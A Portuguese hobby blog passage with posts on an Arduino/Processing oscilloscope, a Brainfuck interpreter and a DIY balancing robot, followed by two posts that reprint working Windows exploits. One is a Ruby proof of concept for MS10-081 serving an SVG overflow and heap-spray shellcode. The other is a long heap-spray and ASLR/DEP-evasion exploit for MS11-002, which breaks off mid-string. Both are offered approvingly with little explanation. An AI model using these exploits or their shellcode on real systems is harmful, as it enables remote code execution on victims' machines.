Assinatura RSS

Osciloscópio com Arduino + Processing

Publicado em

Arduinoscope para os mais íntimos, com função de análise lógica. Mas o que é um osciloscópio? :B

Tio wikipédia responde:

O osciloscópio é um instrumento de medida eletrônico que cria um gráfico bi-dimensional visível de uma ou mais diferenças de potencial. O eixo horizontal do ecrã (monitor) normalmente representa o tempo, tornando o instrumento útil para mostrar sinais periódicos. O eixo vertical comumente mostra a tensão. O monitor é constituído por um “ponto” que periodicamente “varre” a tela da esquerda para a direita.

E  Processing?

Processing é uma linguagem de programação de código aberto e ambiente de desenvolvimento integrado (IDE), construído para as artes eletrônicas e comunidades de design visual com o objetivo de ensinar noções básicas de programação de computador em um contexto visual e para servir como base para cadernos eletrônicos.

Para essa breve explicação usarei OS linux 32bits

Para outros OS, seus respectivos downloads podem ser encontrados aqui: downloads

Requisitos:

  1. controlP5
  2. arduinoscope
  3. processing.serial

Que podem ser todas encontradas aqui: download

  • Para usuarios linux, é necessarios a libs gcc-avr e avr-libc

Como eu sou um ser humano que foi  criado em ambientes windows(não tive culpa!), eu também o testei no mesmo, sem problemas.

Mas como fui rebelado e voltado para OS unix, essa explicação será nesse ambiente:

Preparação:

Primeiramente, extraia todas as libs para o path(PATH_ROOT/processing-1.5/lib) do Processing

No board do arduino vamos fazer o upload da seguinte sketch:


/*
this goes on your arduino
for use with Processing example SimpleSerialArduinoscope

*/

// holds temp vals
int val;

void setup() {
// set 2-12 digital pins to read mode
for (int i=2;i<14;i++){
pinMode(i, INPUT);
}

Serial.begin(115200);
}

void loop() {
// read all analog ports, split by " "
for (int i=0;i<6;i++){
Serial.print(analogRead(i));
Serial.print(" ");
}

// read all digital ports, split by " "
for (int i=2;i<14;i++){
Serial.print(digitalRead(i));
Serial.print(" ");
}

// frame is marked by LF
Serial.println();
}

Feche o IDE do Arduino porque se não dará um bug com a porta serial (Só Deus sabe o porquê).

Agora abra a IDE do Processing e compile o seguinte sketch:


/*
This is a basic serial arduinoscope.

(c) 2009 David Konsumer <david.konsumer@gmail.com>

This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.

This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
Lesser General Public License for more details.

You should have received a copy of the GNU Lesser General
Public License along with this library; if not, write to the
Free Software Foundation, Inc., 59 Temple Place, Suite 330,
Boston, MA  02111-1307  USA
*/

/*

Serial data comes in, in the format

1 23 34 4 5 76
1 23 34 4 5 76
1 23 34 4 5 76
1 23 34 4 5 76

(space seperates pin=data, LF-seperated frame data)

*/

import arduinoscope.*;
import processing.serial.*;

// this example requires controlP5
// http://www.sojamo.de/libraries/controlP5/
import controlP5.*;

// how many scopes, you decide.
Oscilloscope[] scopes = new Oscilloscope[6];
Serial port;
ControlP5 controlP5;

PFont fontLarge;
PFont fontSmall;

int LINE_FEED=10;

int[] vals;

void setup() {
size(800, 800, P2D);
background(0);

controlP5 = new ControlP5(this);

// set these up under tools/create font, if they are not setup.
fontLarge = loadFont("TrebuchetMS-20.vlw");
fontSmall = loadFont("Uni0554-8.vlw");

int[] dimv = new int[2];
dimv[0] = width-130; // 130 margin for text
dimv[1] = height/scopes.length;

// setup vals from serial
vals = new int[scopes.length];

for (int i=0;i<scopes.length;i++){
int[] posv = new int[2];
posv[0]=0;
posv[1]=dimv[1]*i;

// random color, that will look nice and be visible
scopes[i] = new Oscilloscope(this, posv, dimv);
scopes[i].setLine_color(color((int)random(255), (int)random(127)+127, 255));

controlP5.addButton("pause",1,dimv[0]+10,posv[1]+10,32,20).setId(i);
controlP5.addButton("logic",1,dimv[0]+52,posv[1]+10,29,20).setId(i+50);
controlP5.addButton("save",1,dimv[0]+92,posv[1]+10,29,20).setId(i+100);
}

port = new Serial(this, Serial.list()[0], 115200);

// clear and wait for linefeed
port.clear();
port.bufferUntil(LINE_FEED);
}

void draw()
{
background(0);

// int[] vals = getTestValuesSquare();
// int[] vals = getTestValuesSin();

for (int i=0;i<scopes.length;i++){
// update and draw scopes

scopes[i].addData(vals[i]);
scopes[i].draw();

// conversion multiplier for voltage
float multiplier = scopes[i].getMultiplier()/scopes[i].getResolution();

// convert arduino vals to voltage
float minval = scopes[i].getMinval() * multiplier;
float maxval = scopes[i].getMaxval() * multiplier;
int[] values = scopes[i].getValues();
float pinval =  values[values.length-1] * multiplier;

// add lines
scopes[i].drawBounds();
stroke(255);

int[] pos = scopes[i].getPos();
int[] dim = scopes[i].getDim();

line(0, pos[1], width, pos[1]);

// add labels
fill(255);
textFont(fontLarge);
text(pinval, width-60, pos[1] + dim[1] - 10);

textFont(fontSmall);
text("min: " + minval, dim[0] + 10, pos[1] + 40);
text("max: " + maxval, dim[0] + 10, pos[1] + 48);

fill(scopes[i].getLine_color());
text("pin: " + i, dim[0] + 10,pos[1] + dim[1] - 10);
}

// draw text seperator, based on first scope
int[] dim = scopes[0].getDim();
stroke(255);
line(dim[0], 0, dim[0], height);

// update buttons
controlP5.draw();

}

// handles button clicks
void controlEvent(ControlEvent theEvent) {
int id = theEvent.controller().id();

// button families are in chunks of 50 to avoid collisions
if (id < 50){
scopes[id].setPause(!scopes[id].isPause());
}else if (id < 100){
scopes[id-50].setLogicMode(!scopes[id-50].isLogicMode());
}else if(id < 150){
String fname = "data"+(id-100)+".csv";
scopes[id-100].saveData(fname);
println("Saved as "+fname);
}
}

// handle serial data
void serialEvent(Serial p) {
String data = p.readStringUntil(LINE_FEED);
if (data != null) {
// println(data);
vals = int(split(data, ' '));
}
}

// for test data, you can comment, if not using
int d=0;
ControlTimer ct = new ControlTimer();

int[] getTestValuesSin(){
int[] vals = new int[scopes.length];

// this is test data
if (d==45){
d=0;
}

int sval = (int) abs(sin(d*2)*1023.0f);
for (int i=0;i<scopes.length;i++){
vals[i]=sval;
}

d++;

return vals;
}

int oldtime;
int time;
boolean up=false;

int[] getTestValuesSquare(){
int[] vals = new int[scopes.length];

ct.setSpeedOfTime(25);
oldtime=time;
time = ct.second();

if (oldtime==time){
up = !up;
}

for (int i=0;i<scopes.length;i++){
if (up){
vals[i]=1023;
}else{
vals[i]=0;
}
}

return vals;
}

Se você desejar apenas um canal, modifique a seguinte linha:

Oscilloscope[] scopes = new Oscilloscope[6];

Como testar?

Cabo com pino 5v ou 3,3v em pino de 0-5 analógico ou você pode fazer modificações para usar com os pinos digitais.

Com esse script você terá 6 canais de análise. Um possível esquema para tal:

Finalidade?

Inúmeras, mas agora estou usando pra testar picos de sinais com minha antenas wireless com uma gambiarra.

Futuramente, estudarei um modo de criar um eletroencefalograma(EEG) vagabundo caseiro que não deixarei de apresentar a vós, caros leitores 🙂

Referências:

http://pt.wikipedia.org/wiki/Oscilosc%C3%B3pio
http://code.google.com/p/arduinoscope/
http://accrochages.drone.ws/en/node/90
http://www.practicalarduino.com/projects/scope-logic-analyzer

Brincando com Brainfuck

Publicado em

Brainfuck por Wikipédia:

Brainfuck (também conhecido como brainf*ck, ou BF) é uma linguagem de programação esotérica notada pelo seu extremo minimalismo, criada por Urban Müller, em 1993. Ela é uma linguagem Turing completa, desenhada para desafiar e confundir os programadores, e não é útil para uso prático. Pela sua simplicidade, o desenvolvimento de compiladores e interpretadores para essa linguagem é muito mais fácil do que para outras linguagens.

Vamos brincar um pouco!

Para isso vamos utilizar esse interprete em C:


#include <stdio.h>
#include <windows.h>

int  p, r, q;
char a[5000], f[5000], b, o, *s=f;

void interpret(char *c)
{
char *d;

r++;
while( *c ) {
//if(strchr("<>+-,.[]\n",*c))printf("%c",*c);
switch(o=1,*c++) {
case '<': p--;        break;
case '>': p++;        break;
case '+': a[p]++;     break;
case '-': a[p]--;     break;
case '.': putchar(a[p]); fflush(stdout); break;
case ',': a[p]=getchar();fflush(stdout); break;
case '[':
for( b=1,d=c; b && *c; c++ )
b+=*c=='[', b-=*c==']';
if(!b) {
c[-1]=0;
while( a[p] )
interpret(d);
c[-1]=']';
break;
}
case ']':
puts("UNBALANCED BRACKETS"), exit(0);
case '#':
if(q>2)
printf("%2d %2d %2d %2d %2d %2d %2d %2d %2d %2d\n%*s\n",
*a,a[1],a[2],a[3],a[4],a[5],a[6],a[7],a[8],a[9],3*p+2,"^");
break;
default: o=0;
}
if( p<0 || p>100)
puts("RANGE ERROR"), exit(0);
}
r--;
//    chkabort();
}

main(int argc,char *argv[])
{
FILE *z;

q=argc;

if(z=fopen(argv[1],"r")) {
while( (b=getc(z))>0 )
*s++=b;
*s=0;
interpret(f);
}
}

O Brainkfuck possui apenas 8 comandos de operação, outros diferentes dos demais são considerados comentarios

Um exemplo de um algoritmo(?) em Brainfuck:

hello.b

++++++++++[>++++++++>+++++++++++
>---------->+++>++++++++>+++++++
+++++>+++++++++++>++++++++++>+++
++++++++>+++<<<<<<<<<<-]>-.>--.>
++++.>++.>---.>---.>.>.>+.>+++.,

Ela imprime no console um simples “Hello World!”

Interessante, não?! =)

Referências:

http://pt.wikipedia.org/wiki/Brainfuck

brainfuck (também conhecido como brainf*ck, ou BF) é uma linguagem de programação esotérica notada pelo seu extremo minimalismo, criada por Urban Müller, em 1993. Ela é uma linguagem Turing completa, desenhada para desafiar e confundir os programadores, e não é útil para uso prático. Pela sua simplicidade, o desenvolvimento de compiladores e interpretadores para essa linguagem é muito mais fácil do que para outras linguagens.

Montando um Robô Balanço (Balancing Robot)

Publicado em

bal0

Video demo:

Warning: Esse projeto é uma gambiarra! Dispensa o uso de CIs e/ou microprocessadores e afins. Use a “reverge engineer” para obeter os materiais. =)

Retirei esse post do meu antigo blog que excluí.

Iremos criar um simples robô que se sustenta com a inversão de polaridade do seu motor, assim
simulando a ação de balanço

Vamos precisar dos seguintes materiais:
-motor elétrico; //encontrados em brinquedos ;P
-algumas pequenas engrenagens; //ou motor com uma caixa de engrenagem já pronta, poupa trabalho
-um eixo de duas rodas;
-algumas folhas de plástico para fazer rolamentos;
-dois suportes de bateria;
-4 pilhas AA;
-um comutador SPDT //único pólo com dupla aticação;
-um interruptor de metal uma alavanca para o on / off
-um prego de ferro;
-arame ou solda;
-fios condutores de energia;
-uma bateria de relógio;
-cola;

Montando a caixa de engrenajem com eixo:

Pegue o prego e enfie na engrenagem e prenda com a solda no motor, depois case na engrenagem do eixo do motor
agora pegue o chapa de plástico, esse vai ser o pescoço dele
faça dois furos para passar as soldas deixando assim:
caixa0
caixa
caixa3

Montando sua cabeça:

Pegue os suportes de bateria e cole um de cada lado da placa de plástico(pescoço), para ficar mais seguro envolva com fita adesiva

cola
cab0
cab

Montando o ativamento da inversão de polaridade:

Solde na ponta do comutador a bateria de relógio
Pegue o comutador e prenda ou cole na caixa de engrenagem
Encaixe o comutador no motor de modo que fique como uma terceira roda de sustentação:
comu
comu1

Agora é a hora de fazer o circuito bateria-comutador-motor(ATENÇÃO)
Pegue os fios e a chave de on / off ligue assim:
circuito

x1
x2
x3

Chegou agora a hora mais esperada:

O teste 🙂
Sua sustentação é essa:
pronto

Ligue seu Robô balanço e admire!

Espero que eu tenha conseguido ser o mais claro possível, se não entender alguma coisa deixa um comentário que eu ajudo!

Até o próximo projeto! ;*

Iphone perdido? Passwords perdidas! Você: Hacked

Publicado em

Pesquisadores alemães do  Instituto Fraunhofer de Tecnologia da Informação Segura (SIT) demonstraram como recuperar logins e passwords do Iphone 4 com a ajuda do JailBreak

Segue a POC da técnica:

MS10-081: Windows Common Control Library (Comctl32) Heap Overflow

Publicado em
Não poderia deixar de postar a nova vulnerabilidade em windows ;)


#!/usr/bin/env ruby

# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson

require 'socket'

def http_send(sock, data, opts={})
 defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
 opts = defaults.merge(opts)

 code = opts[:code]
 message = opts[:message]
 type = opts[:type]

 date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
 headers = "HTTP/1.1 #{code} #{message}\r\n" +
 "Date: #{date_str}\r\n" +
 "Content-Length: #{data.length}\r\n" +
 "Content-Type: #{type}\r\n\r\n"
 puts "[+] Sending #{opts[:desc]}"
 sock.write(headers + data) rescue return false
 return true
end

def sock_read(sock, out_str, timeout=5)
 begin
 if Kernel.select([sock],[],[],timeout)
 out_str.replace(sock.recv(1024))
 puts "[+] Received:"
 puts "    " + out_str.split("\n")[0]
 return true
 else
 sock.close
 return false
 end
 rescue Exception => ex
 return false
 end
end

port = ARGV[0] || 55555

transform_name = "\x21" * 65535

svg = <<-SVG
<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg xmlns="http://www.w3.org/2000/svg"
 xmlns:xlink="http://www.w3.org/1999/xlink">

 <rect x="50" y="50" height="110" width="110"
 style="fill: #ffffff"
 transform="#{transform_name}(10) translate(30) rotate(45 50 50)"
 >
 </rect>
 <text x="100" y="100">CLICK ME</text>
</svg>
SVG

html = <<-HTML
<html>
 <body>
 <script>
 <!--
 function str_dup(str, length) {
 var result = str;
 while(result.length < length) {
 result += result;
 }
 return result.substr(result.length - length);
 }

 var shellcode = unescape("%u9000%u9090%u9090") +
 // msfpayload windows/exec CMD=calc.exe R | msfencode -t js_le -b "\x00"
 unescape("%u39ba%ue680%udb4f%u29dc%ub1c9%ud933%u2474%u58f4" +
 "%u5031%u8313%u04c0%u5003%u6236%ub313%ueba0%u4cdc" +
 "%u8c30%ua955%u9e01%ub902%u2e33%uef40%uc5bf%u0404" +
 "%uab34%u2b80%u06fd%u02f7%ua6fe%uc837%ua83c%u13cb" +
 "%u0a10%udbf5%u4b65%u0132%u1985%u4deb%u8e37%u1098" +
 "%uaf8b%u1f4e%ud7b3%ue0eb%u6247%u30f5%uf9f7%ua8bd" +
 "%ua57c%uc81d%ub551%u8362%u0ede%u1210%u5f36%u24d9" +
 "%u0c76%u88e4%u4c7b%u2e20%u3b63%u4c5a%u3c1e%u2e99" +
 "%uc9c4%u883c%u6a8f%u28e5%uec5c%u266e%u7a29%u2b28" +
 "%uafac%u5742%u4e25%ud185%u757d%ub901%u1426%u6710" +
 "%u2989%ucf42%u8c76%ue208%ub663%u6952%u3a72%ud4e9" +
 "%u4474%u76f2%u751c%u1979%u8a5b%u5da8%uc093%uf4f1" +
 "%u8d3b%u4563%u2e26%u8a5e%uad5e%u736b%uada5%u7619" +
 "%u69e2%u0af1%u1c7b%ub9f5%u357c%u5c96%ud5ee%ufa77" +
 "%u7c96%u0e88");
 var base = str_dup(unescape("%u2100"), 0x800 - shellcode.length);
 var arr = [];
 for(var i = 0; i < 2000; i++) {
 arr[i] = document.createElement("a");
 arr[i].innerHTML = [base + shellcode].join("");
 }
 -->
 </script>
 <iframe width="100%" height="100%" src="poc.svg" marginheight="0" marginwidth="0"></iframe>
 </body>
</html>
HTML

puts "[+] Listening on port #{port}"
puts

TCPServer.open(port) do |srv|
 while true
 cli = srv.accept
 req = ""
 next unless sock_read(cli, req, 5)
 while req.length > 0
 if req =~ /GET.*svg/i
 break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
 elsif req =~ /QUIT/
 exit()
 else
 break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
 end
 req = ""
 next unless sock_read(cli, req, 5)
 end
 cli.close rescue next
 end
end

MS11-002: Microsoft Data Access Components Vulnerability

Publicado em

Mensagem do dia: Fuck M$!

 


<html xmlns:t = "urn:schemas-microsoft-com:time">
 <head>
 <meta name="License" content="Q Public License;http://en.wikipedia.org/wiki/Q_Public_License">
 <style>
 .body {

 }
 #test {

 }
 </style>
 <script src="heapLib.js"></script>
 <script>
 // This code has been released under the Q Public License by Trolltech
 // http://en.wikipedia.org/wiki/Q_Public_License
 // Source: http://vreugdenhilresearch.nl/ms11-002-pwn2own-heap-overflow/


var StartTime = new Date();
var FinalHeapSpraySize = 900;
//var SmallHoleSize = 0x1F0;
var SmallHoleSize = 0x240;
var GlobalRowCounter = 0;

var localxmlid1;
var localxmlid2;
var localxmlid3;
var localxmlid5;
var adobase = 0;
var finalspray = '';
var heap = null;
var ExpoitTime = 10;
var CurrentHeapSpraySize = 0;


function Start() {
 FaseOne();
}



function FaseOne() {

 localxmlid1 = document.getElementById('xmlid1').recordset;
 localxmlid2 = document.getElementById('xmlid2').recordset;
 localxmlid3 = document.getElementById('xmlid3').recordset;
 localxmlid5 = document.getElementById('xmlid5').recordset;

 localxmlid2.CacheSize = 0x40000358;

 localxmlid1.CacheSize = SmallHoleSize;;   //small hole?
 localxmlid1.AddNew(["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"], ["c"]);
 localxmlid5.AddNew(["BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"], ["c"]);


 var my1field = localxmlid5.Fields.Item(0);
 localxmlid1.MoveFirst();

 localxmlid2.AddNew(["BBBB"], ["c"]);

 localxmlid1.Close();
 CollectGarbage();

 localxmlid3.MoveFirst();

 void(Math.atan2(0xbabe, ('###################### 2 Move First').toString()));
 localxmlid2.MoveFirst();

 void(Math.atan2(0xbabe, ('###################### 5 Move First').toString()));
 localxmlid5.CacheSize = 0x40000008;
 localxmlid5.MoveFirst();
 localxmlid3.AddNew(["MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong"], ["cccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuFINDMEccccc"]);

 var localxmlid4 = document.getElementById('xmlid4').recordset;

 localxmlid4.AddNew(["bb"], ["c"]);

 localxmlid4.MoveNext();


 var localxmlid6 = document.getElementById('xmlid6').recordset;
 localxmlid6.AddNew(["CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"], ["c"]);

 localxmlid2.MoveFirst();

 Math.tan(1);

 document.getElementById('textfaseone').innerText = 'Setting up data for ASLR evasion:';
 if(GlobalRowCounter < 0x10120) {
 window.setTimeout(IncreaseRowCounter, 100);
 }
}


function IncreaseRowCounter() {
 //alert('IncreaseRowCounter: ' + GlobalRowCounter)
 if(GlobalRowCounter < 0x10120) {
 for(i = 0; i < 0x300; i++) {
 GlobalRowCounter++;
 localxmlid2.AddNew(["BBBB"], ["c"]);
 localxmlid2.Delete();
 }
 var percentcomplete = Math.round(GlobalRowCounter /0x10120 * 100);
 document.getElementById('progressfaseone').innerText = percentcomplete + "%";
 window.setTimeout(IncreaseRowCounter, 100);
 }
 else {
 document.getElementById('textfaseonedone').innerText = 'Now searching memory for suitable vtable. Please wait...';
 window.setTimeout(FindADOBase, 100);
 }
}

function FindADOBase() {
 //alert('FindADOBase');


 var myfield = localxmlid3.Fields.Item(1);

 for(i = 0; i < 0xDF6; i++) {
 localxmlid2.AddNew(["BBBB"], ["c"]);
 localxmlid2.MoveFirst();
 if(myfield.Name != "MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong") {
 break;
 }
 }
 //alert('done first');

 void(Math.atan2(0xbabe, ('###################### Add untill vftable 2').toString()));

 var vftable1 = null;
 var vftable2 = null;

 for(i = 0; i < 0xAE0; i++) {
 void(Math.atan2(0xbabe, ('add row: ' + i).toString()));
 localxmlid2.AddNew(["BBBB"], ["c"]);
 localxmlid2.MoveFirst();
 //if(i > 10) {
 //  document.forms[0].myresult.value += i.toString(16) + " : " + escape(myfield.name.substr((2 * i) + 4, 8)) + " : "  + myfield.name.length + "\n";
 //}
 if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uAD68/)) {
 vftable1 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1");
 }
 if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uD738/)) {
 vftable2 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1");
 }
 if(vftable1  && vftable2) {
 break;
 }
 }
 //document.forms[0].myresult.value += "\n\nVFTABLES: " + vftable1 + " : " + vftable2 + "\n\n\n";
 //alert(vftable1);
 if((parseInt(vftable1,16) - 0x1AD68) == (parseInt(vftable2,16) - 0xD738)) {
 adobase = parseInt(vftable1,16) - 0x1AD68;
 document.getElementById('textfoundaddress').innerText = 'Found base address of <censored>.dll: 0x<censored>';// + adobase.toString(16);
 FaseTwo();
 }
 else {
 alert('sadly we failed to read the base address of msado15.dll 😦 ');
 }

}

function FaseTwo() {
 document.getElementById('textfasetwo').innerText = 'Setting up heap for DEP evasion:';
 document.getElementById('progressfasetwo').innerText = '0%';
 heap = new heapLib.ie(0x20000);


 var heapspray = unescape("%u2020%u1604%u0102%u0103%u0104%u0105" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123" + MakeAddressString(adobase)  + "%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F" +
 "%u9090%u9090%u868B%u1108%u0000%u5056%u056A%uA068%u0421%u0516%u185E%u0008%uD0FF%u5058%u0590%u0BBB%u0000%uD0FF%uF88B%u0558%u3B47%u0000%u006A%uFF57%uCCD0" + "%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF" +
 "%u6163%u636C%u652E%u6578%u0000%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578%u0000%u0000" + "%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%